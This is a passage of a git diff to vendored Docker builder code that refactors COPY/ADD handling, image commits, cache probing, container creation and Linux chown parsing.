-			if err != nil {
-				return err
-			}
-			defer os.RemoveAll(filepath.Dir(fi.Path()))
-			decompress = false
-			infos = append(infos, copyInfo{fi, decompress})
-			continue
-		}
-		// not a URL
-		subInfos, err := b.calcCopyInfo(cmdName, orig, allowLocalDecompression, true)
-		if err != nil {
-			return err
-		}
+type archiver interface {
+	ArchivePath(src string, opts *archive.TarOptions) (io.ReadCloser, error)
+}
 
-		infos = append(infos, subInfos...)
+// helper functions to get tar/untar func
+func untarFunc(i interface{}) containerfs.UntarFunc {
+	if ea, ok := i.(extractor); ok {
+		return ea.ExtractArchive
 	}
+	return chrootarchive.Untar
+}
 
-	if len(infos) == 0 {
-		return fmt.Errorf("No source files were specified")
+func tarFunc(i interface{}) containerfs.TarFunc {
+	if ap, ok := i.(archiver); ok {
+		return ap.ArchivePath
 	}
-	if len(infos) > 1 && !strings.HasSuffix(dest, string(os.PathSeparator)) {
-		return fmt.Errorf("When using %s with more than one source file, the destination must be a directory and end with a /", cmdName)
-	}
-
-	// For backwards compat, if there's just one info then use it as the
-	// cache look-up string, otherwise hash 'em all into one
-	var srcHash string
-	var origPaths string
+	return archive.TarWithOptions
+}
 
-	if len(infos) == 1 {
-		fi := infos[0].FileInfo
-		origPaths = fi.Name()
-		if hfi, ok := fi.(builder.Hashed); ok {
-			srcHash = hfi.Hash()
-		}
-	} else {
-		var hashs []string
-		var origs []string
-		for _, info := range infos {
-			fi := info.FileInfo
-			origs = append(origs, fi.Name())
-			if hfi, ok := fi.(builder.Hashed); ok {
-				hashs = append(hashs, hfi.Hash())
-			}
-		}
-		hasher := sha256.New()
-		hasher.Write([]byte(strings.Join(hashs, ",")))
-		srcHash = "multi:" + hex.EncodeToString(hasher.Sum(nil))
-		origPaths = strings.Join(origs, " ")
+func (b *Builder) getArchiver(src, dst containerfs.Driver) Archiver {
+	t, u := tarFunc(src), untarFunc(dst)
+	return &containerfs.Archiver{
+		SrcDriver:     src,
+		DstDriver:     dst,
+		Tar:           t,
+		Untar:         u,
+		IDMappingsVar: b.idMappings,
 	}
+}
 
-	cmd := b.runConfig.Cmd
-	b.runConfig.Cmd = strslice.StrSlice(append(getShell(b.runConfig), fmt.Sprintf("#(nop) %s %s in %s ", cmdName, srcHash, dest)))
-	defer func(cmd strslice.StrSlice) { b.runConfig.Cmd = cmd }(cmd)
-
-	if hit, err := b.probeCache(); err != nil {
-		return err
-	} else if hit {
+func (b *Builder) commit(dispatchState *dispatchState, comment string) error {
+	if b.disableCommit {
 		return nil
 	}
-
-	container, err := b.docker.ContainerCreate(types.ContainerCreateConfig{Config: b.runConfig})
-	if err != nil {
-		return err
+	if !dispatchState.hasFromImage() {
+		return errors.New("Please provide a source image with `from` prior to commit")
 	}
-	b.tmpContainers[container.ID] = struct{}{}
 
-	comment := fmt.Sprintf("%s %s in %s", cmdName, origPaths, dest)
-
-	// Twiddle the destination when its a relative path - meaning, make it
-	// relative to the WORKINGDIR
-	if dest, err = normaliseDest(cmdName, b.runConfig.WorkingDir, dest); err != nil {
+	runConfigWithCommentCmd := copyRunConfig(dispatchState.runConfig, withCmdComment(comment, dispatchState.operatingSystem))
+	id, err := b.probeAndCreate(dispatchState, runConfigWithCommentCmd)
+	if err != nil || id == "" {
 		return err
 	}
 
-	for _, info := range infos {
-		if err := b.docker.CopyOnBuild(container.ID, dest, info.FileInfo, info.decompress); err != nil {
-			return err
-		}
-	}
-
-	return b.commit(container.ID, cmd, comment)
+	return b.commitContainer(dispatchState, id, runConfigWithCommentCmd)
 }
 
-func (b *Builder) download(srcURL string) (fi builder.FileInfo, err error) {
-	// get filename from URL
-	u, err := url.Parse(srcURL)
-	if err != nil {
-		return
-	}
-	path := filepath.FromSlash(u.Path) // Ensure in platform semantics
-	if strings.HasSuffix(path, string(os.PathSeparator)) {
-		path = path[:len(path)-1]
-	}
-	parts := strings.Split(path, string(os.PathSeparator))
-	filename := parts[len(parts)-1]
-	if filename == "" {
-		err = fmt.Errorf("cannot determine filename from url: %s", u)
-		return
+func (b *Builder) commitContainer(dispatchState *dispatchState, id string, containerConfig *container.Config) error {
+	if b.disableCommit {
+		return nil
 	}
 
-	// Initiate the download
-	resp, err := httputils.Download(srcURL)
-	if err != nil {
-		return
+	commitCfg := backend.CommitConfig{
+		Author: dispatchState.maintainer,
+		// TODO: this copy should be done by Commit()
+		Config:          copyRunConfig(dispatchState.runConfig),
+		ContainerConfig: containerConfig,
+		ContainerID:     id,
 	}
 
-	// Prepare file in a tmp dir
-	tmpDir, err := ioutils.TempDir("", "docker-remote")
-	if err != nil {
-		return
-	}
-	defer func() {
-		if err != nil {
-			os.RemoveAll(tmpDir)
-		}
-	}()
-	tmpFileName := filepath.Join(tmpDir, filename)
-	tmpFile, err := os.OpenFile(tmpFileName, os.O_RDWR|os.O_CREATE|os.O_EXCL, 0600)
-	if err != nil {
-		return
-	}
+	imageID, err := b.docker.CommitBuildStep(commitCfg)
+	dispatchState.imageID = string(imageID)
+	return err
+}
 
-	stdoutFormatter := b.Stdout.(*streamformatter.StdoutFormatter)
-	progressOutput := stdoutFormatter.StreamFormatter.NewProgressOutput(stdoutFormatter.Writer, true)
-	progressReader := progress.NewProgressReader(resp.Body, progressOutput, resp.ContentLength, "", "Downloading")
-	// Download and dump result to tmp file
-	if _, err = io.Copy(tmpFile, progressReader); err != nil {
-		tmpFile.Close()
-		return
-	}
-	fmt.Fprintln(b.Stdout)
-	// ignoring error because the file was already opened successfully
-	tmpFileSt, err := tmpFile.Stat()
+func (b *Builder) exportImage(state *dispatchState, layer builder.RWLayer, parent builder.Image, runConfig *container.Config) error {
+	newLayer, err := layer.Commit()
 	if err != nil {
-		tmpFile.Close()
-		return
+		return err
 	}
 
-	// Set the mtime to the Last-Modified header value if present
-	// Otherwise just remove atime and mtime
-	mTime := time.Time{}
+	// add an image mount without an image so the layer is properly unmounted
+	// if there is an error before we can add the full mount with image
+	b.imageSources.Add(newImageMount(nil, newLayer))
 
-	lastMod := resp.Header.Get("Last-Modified")
-	if lastMod != "" {
-		// If we can't parse it then just let it default to 'zero'
-		// otherwise use the parsed time value
-		if parsedMTime, err := http.ParseTime(lastMod); err == nil {
-			mTime = parsedMTime
-		}
+	parentImage, ok := parent.(*image.Image)
+	if !ok {
+		return errors.Errorf("unexpected image type")
 	}
 
-	tmpFile.Close()
+	newImage := image.NewChildImage(parentImage, image.ChildConfig{
+		Author:          state.maintainer,
+		ContainerConfig: runConfig,
+		DiffID:          newLayer.DiffID(),
+		Config:          copyRunConfig(state.runConfig),
+	}, parentImage.OS)
 
-	if err = system.Chtimes(tmpFileName, mTime, mTime); err != nil {
-		return
-	}
-
-	// Calc the checksum, even if we're using the cache
-	r, err := archive.Tar(tmpFileName, archive.Uncompressed)
+	// TODO: it seems strange to marshal this here instead of just passing in the
+	// image struct
+	config, err := newImage.MarshalJSON()
 	if err != nil {
-		return
+		return errors.Wrap(err, "failed to encode image config")
 	}
-	tarSum, err := tarsum.NewTarSum(r, true, tarsum.Version1)
+
+	exportedImage, err := b.docker.CreateImage(config, state.imageID)
 	if err != nil {
-		return
+		return errors.Wrapf(err, "failed to export image")
 	}
-	if _, err = io.Copy(ioutil.Discard, tarSum); err != nil {
-		return
-	}
-	hash := tarSum.Sum(nil)
-	r.Close()
-	return &builder.HashedFileInfo{FileInfo: builder.PathFileInfo{FileInfo: tmpFileSt, FilePath: tmpFileName}, FileHash: hash}, nil
-}
 
-func (b *Builder) calcCopyInfo(cmdName, origPath string, allowLocalDecompression, allowWildcards bool) ([]copyInfo, error) {
+	state.imageID = exportedImage.ImageID()
+	b.imageSources.Add(newImageMount(exportedImage, newLayer))
+	return nil
+}
 
-	// Work in daemon-specific OS filepath semantics
-	origPath = filepath.FromSlash(origPath)
+func (b *Builder) performCopy(state *dispatchState, inst copyInstruction) error {
+	srcHash := getSourceHashFromInfos(inst.infos)
 
-	if origPath != "" && origPath[0] == os.PathSeparator && len(origPath) > 1 {
-		origPath = origPath[1:]
+	var chownComment string
+	if inst.chownStr != "" {
+		chownComment = fmt.Sprintf("--chown=%s", inst.chownStr)
 	}
-	origPath = strings.TrimPrefix(origPath, "."+string(os.PathSeparator))
-
-	// Deal with wildcards
-	if allowWildcards && containsWildcards(origPath) {
-		var copyInfos []copyInfo
-		if err := b.context.Walk("", func(path string, info builder.FileInfo, err error) error {
-			if err != nil {
-				return err
-			}
-			if info.Name() == "" {
-				// Why are we doing this check?
-				return nil
-			}
-			if match, _ := filepath.Match(origPath, path); !match {
-				return nil
-			}
+	commentStr := fmt.Sprintf("%s %s%s in %s ", inst.cmdName, chownComment, srcHash, inst.dest)
 
-			// Note we set allowWildcards to false in case the name has
-			// a * in it
-			subInfos, err := b.calcCopyInfo(cmdName, path, allowLocalDecompression, false)
-			if err != nil {
-				return err
-			}
-			copyInfos = append(copyInfos, subInfos...)
-			return nil
-		}); err != nil {
-			return nil, err
-		}
-		return copyInfos, nil
+	// TODO: should this have been using origPaths instead of srcHash in the comment?
+	runConfigWithCommentCmd := copyRunConfig(
+		state.runConfig,
+		withCmdCommentString(commentStr, state.operatingSystem))
+	hit, err := b.probeCache(state, runConfigWithCommentCmd)
+	if err != nil || hit {
+		return err
 	}
 
-	// Must be a dir or a file
-
-	statPath, fi, err := b.context.Stat(origPath)
+	imageMount, err := b.imageSources.Get(state.imageID, true, state.operatingSystem)
 	if err != nil {
-		return nil, err
+		return errors.Wrapf(err, "failed to get destination image %q", state.imageID)
 	}
 
-	copyInfos := []copyInfo{{FileInfo: fi, decompress: allowLocalDecompression}}
-
-	hfi, handleHash := fi.(builder.Hashed)
-	if !handleHash {
-		return copyInfos, nil
+	rwLayer, err := imageMount.NewRWLayer()
+	if err != nil {
+		return err
 	}
+	defer rwLayer.Release()
 
-	// Deal with the single file case
-	if !fi.IsDir() {
-		hfi.SetHash("file:" + hfi.Hash())
-		return copyInfos, nil
-	}
-	// Must be a dir
-	var subfiles []string
-	err = b.context.Walk(statPath, func(path string, info builder.FileInfo, err error) error {
-		if err != nil {
-			return err
-		}
-		// we already checked handleHash above
-		subfiles = append(subfiles, info.(builder.Hashed).Hash())
-		return nil
-	})
+	destInfo, err := createDestInfo(state.runConfig.WorkingDir, inst, rwLayer, state.operatingSystem)
 	if err != nil {
-		return nil, err
+		return err
 	}
 
-	sort.Strings(subfiles)
-	hasher := sha256.New()
-	hasher.Write([]byte(strings.Join(subfiles, ",")))
-	hfi.SetHash("dir:" + hex.EncodeToString(hasher.Sum(nil)))
-
-	return copyInfos, nil
-}
-
-func (b *Builder) processImageFrom(img builder.Image) error {
-	if img != nil {
-		b.image = img.ImageID()
-
-		if img.RunConfig() != nil {
-			b.runConfig = img.RunConfig()
+	chownPair := b.idMappings.RootPair()
+	// if a chown was requested, perform the steps to get the uid, gid
+	// translated (if necessary because of user namespaces), and replace
+	// the root pair with the chown pair for copy operations
+	if inst.chownStr != "" {
+		chownPair, err = parseChownFlag(inst.chownStr, destInfo.root.Path(), b.idMappings)
+		if err != nil {
+			return errors.Wrapf(err, "unable to convert uid/gid chown string to host mapping")
 		}
 	}
 
-	// Check to see if we have a default PATH, note that windows won't
-	// have one as its set by HCS
-	if system.DefaultPathEnv != "" {
-		// Convert the slice of strings that represent the current list
-		// of env vars into a map so we can see if PATH is already set.
-		// If its not set then go ahead and give it our default value
-		configEnv := opts.ConvertKVStringsToMap(b.runConfig.Env)
-		if _, ok := configEnv["PATH"]; !ok {
-			b.runConfig.Env = append(b.runConfig.Env,
-				"PATH="+system.DefaultPathEnv)
+	for _, info := range inst.infos {
+		opts := copyFileOptions{
+			decompress: inst.allowLocalDecompression,
+			archiver:   b.getArchiver(info.root, destInfo.root),
+			chownPair:  chownPair,
+		}
+		if err := performCopyForInfo(destInfo, info, opts); err != nil {
+			return errors.Wrapf(err, "failed to copy files")
 		}
 	}
+	return b.exportImage(state, rwLayer, imageMount.Image(), runConfigWithCommentCmd)
+}
 
-	if img == nil {
-		// Typically this means they used "FROM scratch"
-		return nil
+func createDestInfo(workingDir string, inst copyInstruction, rwLayer builder.RWLayer, platform string) (copyInfo, error) {
+	// Twiddle the destination when it's a relative path - meaning, make it
+	// relative to the WORKINGDIR
+	dest, err := normalizeDest(workingDir, inst.dest, platform)
+	if err != nil {
+		return copyInfo{}, errors.Wrapf(err, "invalid %s", inst.cmdName)
 	}
 
-	// Process ONBUILD triggers if they exist
-	if nTriggers := len(b.runConfig.OnBuild); nTriggers != 0 {
-		word := "trigger"
-		if nTriggers > 1 {
-			word = "triggers"
+	return copyInfo{root: rwLayer.Root(), path: dest}, nil
+}
+
+// normalizeDest normalises the destination of a COPY/ADD command in a
+// platform semantically consistent way.
+func normalizeDest(workingDir, requested string, platform string) (string, error) {
+	dest := fromSlash(requested, platform)
+	endsInSlash := strings.HasSuffix(dest, string(separator(platform)))
+
+	if platform != "windows" {
+		if !path.IsAbs(requested) {
+			dest = path.Join("/", filepath.ToSlash(workingDir), dest)
+			// Make sure we preserve any trailing slash
+			if endsInSlash {
+				dest += "/"
+			}
+		}
+		return dest, nil
+	}
+
+	// We are guaranteed that the working directory is already consistent,
+	// However, Windows also has, for now, the limitation that ADD/COPY can
+	// only be done to the system drive, not any drives that might be present
+	// as a result of a bind mount.
+	//
+	// So... if the path requested is Linux-style absolute (/foo or \\foo),
+	// we assume it is the system drive. If it is a Windows-style absolute
+	// (DRIVE:\\foo), error if DRIVE is not C. And finally, ensure we
+	// strip any configured working directories drive letter so that it
+	// can be subsequently legitimately converted to a Windows volume-style
+	// pathname.
+
+	// Not a typo - filepath.IsAbs, not system.IsAbs on this next check as
+	// we only want to validate where the DriveColon part has been supplied.
+	if filepath.IsAbs(dest) {
+		if strings.ToUpper(string(dest[0])) != "C" {
+			return "", fmt.Errorf("Windows does not support destinations not on the system drive (C:)")
 		}
-		fmt.Fprintf(b.Stderr, "# Executing %d build %s...\n", nTriggers, word)
+		dest = dest[2:] // Strip the drive letter
 	}
 
-	// Copy the ONBUILD triggers, and remove them from the config, since the config will be committed.
-	onBuildTriggers := b.runConfig.OnBuild
-	b.runConfig.OnBuild = []string{}
-
-	// parse the ONBUILD triggers by invoking the parser
-	for _, step := range onBuildTriggers {
-		ast, err := parser.Parse(strings.NewReader(step), &b.directive)
-		if err != nil {
-			return err
+	// Cannot handle relative where WorkingDir is not the system drive.
+	if len(workingDir) > 0 {
+		if ((len(workingDir) > 1) && !system.IsAbs(workingDir[2:])) || (len(workingDir) == 1) {
+			return "", fmt.Errorf("Current WorkingDir %s is not platform consistent", workingDir)
 		}
-
-		total := len(ast.Children)
-		for _, n := range ast.Children {
-			if err := b.checkDispatch(n, true); err != nil {
-				return err
+		if !system.IsAbs(dest) {
+			if string(workingDir[0]) != "C" {
+				return "", fmt.Errorf("Windows does not support relative paths when WORKDIR is not the system drive")
 			}
-		}
-		for i, n := range ast.Children {
-			if err := b.dispatch(i, total, n); err != nil {
-				return err
+			dest = filepath.Join(string(os.PathSeparator), workingDir[2:], dest)
+			// Make sure we preserve any trailing slash
+			if endsInSlash {
+				dest += string(os.PathSeparator)
 			}
 		}
 	}
-
-	return nil
+	return dest, nil
 }
 
-// probeCache checks if cache match can be found for current build instruction.
-// If an image is found, probeCache returns `(true, nil)`.
-// If no image is found, it returns `(false, nil)`.
-// If there is any error, it returns `(false, err)`.
-func (b *Builder) probeCache() (bool, error) {
-	c := b.imageCache
-	if c == nil || b.options.NoCache || b.cacheBusted {
-		return false, nil
-	}
-	cache, err := c.GetCache(b.image, b.runConfig)
-	if err != nil {
-		return false, err
+// For backwards compat, if there's just one info then use it as the
+// cache look-up string, otherwise hash 'em all into one
+func getSourceHashFromInfos(infos []copyInfo) string {
+	if len(infos) == 1 {
+		return infos[0].hash
 	}
-	if len(cache) == 0 {
-		logrus.Debugf("[BUILDER] Cache miss: %s", b.runConfig.Cmd)
-		b.cacheBusted = true
-		return false, nil
+	var hashs []string
+	for _, info := range infos {
+		hashs = append(hashs, info.hash)
 	}
+	return hashStringSlice("multi", hashs)
+}
 
-	fmt.Fprintf(b.Stdout, " ---> Using cache\n")
-	logrus.Debugf("[BUILDER] Use cached version: %s", b.runConfig.Cmd)
-	b.image = string(cache)
-
-	return true, nil
+func hashStringSlice(prefix string, slice []string) string {
+	hasher := sha256.New()
+	hasher.Write([]byte(strings.Join(slice, ",")))
+	return prefix + ":" + hex.EncodeToString(hasher.Sum(nil))
 }
 
-func (b *Builder) create() (string, error) {
-	if b.image == "" && !b.noBaseImage {
-		return "", fmt.Errorf("Please provide a source image with `from` prior to run")
-	}
-	b.runConfig.Image = b.image
+type runConfigModifier func(*container.Config)
 
-	resources := container.Resources{
-		CgroupParent: b.options.CgroupParent,
-		CPUShares:    b.options.CPUShares,
-		CPUPeriod:    b.options.CPUPeriod,
-		CPUQuota:     b.options.CPUQuota,
-		CpusetCpus:   b.options.CPUSetCPUs,
-		CpusetMems:   b.options.CPUSetMems,
-		Memory:       b.options.Memory,
-		MemorySwap:   b.options.MemorySwap,
-		Ulimits:      b.options.Ulimits,
-	}
-
-	// TODO: why not embed a hostconfig in builder?
-	hostConfig := &container.HostConfig{
-		SecurityOpt: b.options.SecurityOpt,
-		Isolation:   b.options.Isolation,
-		ShmSize:     b.options.ShmSize,
-		Resources:   resources,
-		NetworkMode: container.NetworkMode(b.options.NetworkMode),
+func withCmd(cmd []string) runConfigModifier {
+	return func(runConfig *container.Config) {
+		runConfig.Cmd = cmd
 	}
+}
 
-	config := *b.runConfig
-
-	// Create the container
-	c, err := b.docker.ContainerCreate(types.ContainerCreateConfig{
-		Config:     b.runConfig,
-		HostConfig: hostConfig,
-	})
-	if err != nil {
-		return "", err
+// withCmdComment sets Cmd to a nop comment string. See withCmdCommentString for
+// why there are two almost identical versions of this.
+func withCmdComment(comment string, platform string) runConfigModifier {
+	return func(runConfig *container.Config) {
+		runConfig.Cmd = append(getShell(runConfig, platform), "#(nop) ", comment)
 	}
-	for _, warning := range c.Warnings {
-		fmt.Fprintf(b.Stdout, " ---> [Warning] %s\n", warning)
-	}
-
-	b.tmpContainers[c.ID] = struct{}{}
-	fmt.Fprintf(b.Stdout, " ---> Running in %s\n", stringid.TruncateID(c.ID))
+}
 
-	// override the entry point that may have been picked up from the base image
-	if err := b.docker.ContainerUpdateCmdOnBuild(c.ID, config.Cmd); err != nil {
-		return "", err
+// withCmdCommentString exists to maintain compatibility with older versions.
+// A few instructions (workdir, copy, add) used a nop comment that is a single arg
+// where as all the other instructions used a two arg comment string. This
+// function implements the single arg version.
+func withCmdCommentString(comment string, platform string) runConfigModifier {
+	return func(runConfig *container.Config) {
+		runConfig.Cmd = append(getShell(runConfig, platform), "#(nop) "+comment)
 	}
+}
 
-	return c.ID, nil
+func withEnv(env []string) runConfigModifier {
+	return func(runConfig *container.Config) {
+		runConfig.Env = env
+	}
 }
 
-var errCancelled = errors.New("build cancelled")
-
-func (b *Builder) run(cID string) (err error) {
-	errCh := make(chan error)
-	go func() {
-		errCh <- b.docker.ContainerAttachRaw(cID, nil, b.Stdout, b.Stderr, true)
-	}()
-
-	finished := make(chan struct{})
-	cancelErrCh := make(chan error, 1)
-	go func() {
-		select {
-		case <-b.clientCtx.Done():
-			logrus.Debugln("Build cancelled, killing and removing container:", cID)
-			b.docker.ContainerKill(cID, 0)
-			b.removeContainer(cID)
-			cancelErrCh <- errCancelled
-		case <-finished:
-			cancelErrCh <- nil
+// withEntrypointOverride sets an entrypoint on runConfig if the command is
+// not empty. The entrypoint is left unmodified if command is empty.
+//
+// The dockerfile RUN instruction expect to run without an entrypoint
+// so the runConfig entrypoint needs to be modified accordingly. ContainerCreate
+// will change a []string{""} entrypoint to nil, so we probe the cache with the
+// nil entrypoint.
+func withEntrypointOverride(cmd []string, entrypoint []string) runConfigModifier {
+	return func(runConfig *container.Config) {
+		if len(cmd) > 0 {
+			runConfig.Entrypoint = entrypoint
 		}
-	}()
+	}
+}
 
-	if err := b.docker.ContainerStart(cID, nil, "", ""); err != nil {
-		close(finished)
-		if cancelErr := <-cancelErrCh; cancelErr != nil {
-			logrus.Debugf("Build cancelled (%v) and got an error from ContainerStart: %v",
-				cancelErr, err)
+func copyRunConfig(runConfig *container.Config, modifiers ...runConfigModifier) *container.Config {
+	copy := *runConfig
+	copy.Cmd = copyStringSlice(runConfig.Cmd)
+	copy.Env = copyStringSlice(runConfig.Env)
+	copy.Entrypoint = copyStringSlice(runConfig.Entrypoint)
+	copy.OnBuild = copyStringSlice(runConfig.OnBuild)
+	copy.Shell = copyStringSlice(runConfig.Shell)
+
+	if copy.Volumes != nil {
+		copy.Volumes = make(map[string]struct{}, len(runConfig.Volumes))
+		for k, v := range runConfig.Volumes {
+			copy.Volumes[k] = v
 		}
-		return err
 	}
 
-	// Block on reading output from container, stop on err or chan closed
-	if err := <-errCh; err != nil {
-		close(finished)
-		if cancelErr := <-cancelErrCh; cancelErr != nil {
-			logrus.Debugf("Build cancelled (%v) and got an error from errCh: %v",
-				cancelErr, err)
+	if copy.ExposedPorts != nil {
+		copy.ExposedPorts = make(nat.PortSet, len(runConfig.ExposedPorts))
+		for k, v := range runConfig.ExposedPorts {
+			copy.ExposedPorts[k] = v
 		}
-		return err
 	}
 
-	if ret, _ := b.docker.ContainerWait(cID, -1); ret != 0 {
-		close(finished)
-		if cancelErr := <-cancelErrCh; cancelErr != nil {
-			logrus.Debugf("Build cancelled (%v) and got a non-zero code from ContainerWait: %d",
-				cancelErr, ret)
-		}
-		// TODO: change error type, because jsonmessage.JSONError assumes HTTP
-		return &jsonmessage.JSONError{
-			Message: fmt.Sprintf("The command '%s' returned a non-zero code: %d", strings.Join(b.runConfig.Cmd, " "), ret),
-			Code:    ret,
+	if copy.Labels != nil {
+		copy.Labels = make(map[string]string, len(runConfig.Labels))
+		for k, v := range runConfig.Labels {
+			copy.Labels[k] = v
 		}
 	}
-	close(finished)
-	return <-cancelErrCh
-}
 
-func (b *Builder) removeContainer(c string) error {
-	rmConfig := &types.ContainerRmConfig{
-		ForceRemove:  true,
-		RemoveVolume: true,
+	for _, modifier := range modifiers {
+		modifier(&copy)
 	}
-	if err := b.docker.ContainerRm(c, rmConfig); err != nil {
-		fmt.Fprintf(b.Stdout, "Error removing intermediate container %s: %v\n", stringid.TruncateID(c), err)
-		return err
+	return &copy
+}
+
+func copyStringSlice(orig []string) []string {
+	if orig == nil {
+		return nil
 	}
-	return nil
+	return append([]string{}, orig...)
 }
 
-func (b *Builder) clearTmp() {
-	for c := range b.tmpContainers {
-		if err := b.removeContainer(c); err != nil {
-			return
-		}
-		delete(b.tmpContainers, c)
-		fmt.Fprintf(b.Stdout, "Removing intermediate container %s\n", stringid.TruncateID(c))
+// getShell is a helper function which gets the right shell for prefixing the
+// shell-form of RUN, ENTRYPOINT and CMD instructions
+func getShell(c *container.Config, os string) []string {
+	if 0 == len(c.Shell) {
+		return append([]string{}, defaultShellForOS(os)[:]...)
 	}
+	return append([]string{}, c.Shell[:]...)
 }
 
-// readDockerfile reads a Dockerfile from the current context.
-func (b *Builder) readDockerfile() error {
-	// If no -f was specified then look for 'Dockerfile'. If we can't find
-	// that then look for 'dockerfile'.  If neither are found then default
-	// back to 'Dockerfile' and use that in the error message.
-	if b.options.Dockerfile == "" {
-		b.options.Dockerfile = builder.DefaultDockerfileName
-		if _, _, err := b.context.Stat(b.options.Dockerfile); os.IsNotExist(err) {
-			lowercase := strings.ToLower(b.options.Dockerfile)
-			if _, _, err := b.context.Stat(lowercase); err == nil {
-				b.options.Dockerfile = lowercase
-			}
-		}
+func (b *Builder) probeCache(dispatchState *dispatchState, runConfig *container.Config) (bool, error) {
+	cachedID, err := b.imageProber.Probe(dispatchState.imageID, runConfig)
+	if cachedID == "" || err != nil {
+		return false, err
 	}
+	fmt.Fprint(b.Stdout, " ---> Using cache\n")
 
-	err := b.parseDockerfile()
+	dispatchState.imageID = cachedID
+	return true, nil
+}
 
-	if err != nil {
-		return err
-	}
+var defaultLogConfig = container.LogConfig{Type: "none"}
 
-	// After the Dockerfile has been parsed, we need to check the .dockerignore
-	// file for either "Dockerfile" or ".dockerignore", and if either are
-	// present then erase them from the build context. These files should never
-	// have been sent from the client but we did send them to make sure that
-	// we had the Dockerfile to actually parse, and then we also need the
-	// .dockerignore file to know whether either file should be removed.
-	// Note that this assumes the Dockerfile has been read into memory and
-	// is now safe to be removed.
-	if dockerIgnore, ok := b.context.(builder.DockerIgnoreContext); ok {
-		dockerIgnore.Process([]string{b.options.Dockerfile})
+func (b *Builder) probeAndCreate(dispatchState *dispatchState, runConfig *container.Config) (string, error) {
+	if hit, err := b.probeCache(dispatchState, runConfig); err != nil || hit {
+		return "", err
 	}
-	return nil
+	return b.create(runConfig)
 }
 
-func (b *Builder) parseDockerfile() error {
-	f, err := b.context.Open(b.options.Dockerfile)
+func (b *Builder) create(runConfig *container.Config) (string, error) {
+	logrus.Debugf("[BUILDER] Command to be executed: %v", runConfig.Cmd)
+	hostConfig := hostConfigFromOptions(b.options)
+	container, err := b.containerManager.Create(runConfig, hostConfig)
 	if err != nil {
-		if os.IsNotExist(err) {
-			return fmt.Errorf("Cannot locate specified Dockerfile: %s", b.options.Dockerfile)
-		}
-		return err
+		return "", err
 	}
-	defer f.Close()
-	if f, ok := f.(*os.File); ok {
-		// ignoring error because Open already succeeded
-		fi, err := f.Stat()
-		if err != nil {
-			return fmt.Errorf("Unexpected error reading Dockerfile: %v", err)
-		}
-		if fi.Size() == 0 {
-			return fmt.Errorf("The Dockerfile (%s) cannot be empty", b.options.Dockerfile)
-		}
+	// TODO: could this be moved into containerManager.Create() ?
+	for _, warning := range container.Warnings {
+		fmt.Fprintf(b.Stdout, " ---> [Warning] %s\n", warning)
 	}
-	b.dockerfile, err = parser.Parse(f, &b.directive)
-	if err != nil {
-		return err
+	fmt.Fprintf(b.Stdout, " ---> Running in %s\n", stringid.TruncateID(container.ID))
+	return container.ID, nil
+}
+
+func hostConfigFromOptions(options *types.ImageBuildOptions) *container.HostConfig {
+	resources := container.Resources{
+		CgroupParent: options.CgroupParent,
+		CPUShares:    options.CPUShares,
+		CPUPeriod:    options.CPUPeriod,
+		CPUQuota:     options.CPUQuota,
+		CpusetCpus:   options.CPUSetCPUs,
+		CpusetMems:   options.CPUSetMems,
+		Memory:       options.Memory,
+		MemorySwap:   options.MemorySwap,
+		Ulimits:      options.Ulimits,
+	}
+
+	hc := &container.HostConfig{
+		SecurityOpt: options.SecurityOpt,
+		Isolation:   options.Isolation,
+		ShmSize:     options.ShmSize,
+		Resources:   resources,
+		NetworkMode: container.NetworkMode(options.NetworkMode),
+		// Set a log config to override any default value set on the daemon
+		LogConfig:  defaultLogConfig,
+		ExtraHosts: options.ExtraHosts,
 	}
 
-	return nil
+	// For WCOW, the default of 20GB hard-coded in the platform
+	// is too small for builder scenarios where many users are
+	// using RUN statements to install large amounts of data.
+	// Use 127GB as that's the default size of a VHD in Hyper-V.
+	if runtime.GOOS == "windows" && options.Platform == "windows" {
+		hc.StorageOpt = make(map[string]string)
+		hc.StorageOpt["size"] = "127GB"
+	}
+
+	return hc
 }
 
-// determine if build arg is part of built-in args or user
-// defined args in Dockerfile at any point in time.
-func (b *Builder) isBuildArgAllowed(arg string) bool {
-	if _, ok := BuiltinAllowedBuildArgs[arg]; ok {
-		return true
+// fromSlash works like filepath.FromSlash but with a given OS platform field
+func fromSlash(path, platform string) string {
+	if platform == "windows" {
+		return strings.Replace(path, "/", "\\", -1)
 	}
-	if _, ok := b.allowedBuildArgs[arg]; ok {
-		return true
+	return path
+}
+
+// separator returns a OS path separator for the given OS platform
+func separator(platform string) byte {
+	if platform == "windows" {
+		return '\\'
 	}
-	return false
+	return '/'
 }
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_linux.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_linux.go
new file mode 100644
index 0000000000..1014b16a21
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/internals_linux.go
@@ -0,0 +1,88 @@
+package dockerfile // import "github.com/docker/docker/builder/dockerfile"
+
+import (
+	"path/filepath"
+	"strconv"
+	"strings"
+
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/symlink"
+	lcUser "github.com/opencontainers/runc/libcontainer/user"
+	"github.com/pkg/errors"
+)
+
+func parseChownFlag(chown, ctrRootPath string, idMappings *idtools.IDMappings) (idtools.IDPair, error) {
+	var userStr, grpStr string
+	parts := strings.Split(chown, ":")
+	if len(parts) > 2 {
+		return idtools.IDPair{}, errors.New("invalid chown string format: " + chown)
+	}
+	if len(parts) == 1 {
+		// if no group specified, use the user spec as group as well
+		userStr, grpStr = parts[0], parts[0]
+	} else {
+		userStr, grpStr = parts[0], parts[1]
+	}
+
+	passwdPath, err := symlink.FollowSymlinkInScope(filepath.Join(ctrRootPath, "etc", "passwd"), ctrRootPath)
+	if err != nil {
+		return idtools.IDPair{}, errors.Wrapf(err, "can't resolve /etc/passwd path in container rootfs")
+	}
+	groupPath, err := symlink.FollowSymlinkInScope(filepath.Join(ctrRootPath, "etc", "group"), ctrRootPath)
+	if err != nil {
+		return idtools.IDPair{}, errors.Wrapf(err, "can't resolve /etc/group path in container rootfs")
+	}
+	uid, err := lookupUser(userStr, passwdPath)
+	if err != nil {
+		return idtools.IDPair{}, errors.Wrapf(err, "can't find uid for user "+userStr)
+	}
+	gid, err := lookupGroup(grpStr, groupPath)
+	if err != nil {
+		return idtools.IDPair{}, errors.Wrapf(err, "can't find gid for group "+grpStr)
+	}
+
+	// convert as necessary because of user namespaces
+	chownPair, err := idMappings.ToHost(idtools.IDPair{UID: uid, GID: gid})
+	if err != nil {
+		return idtools.IDPair{}, errors.Wrapf(err, "unable to convert uid/gid to host mapping")
+	}
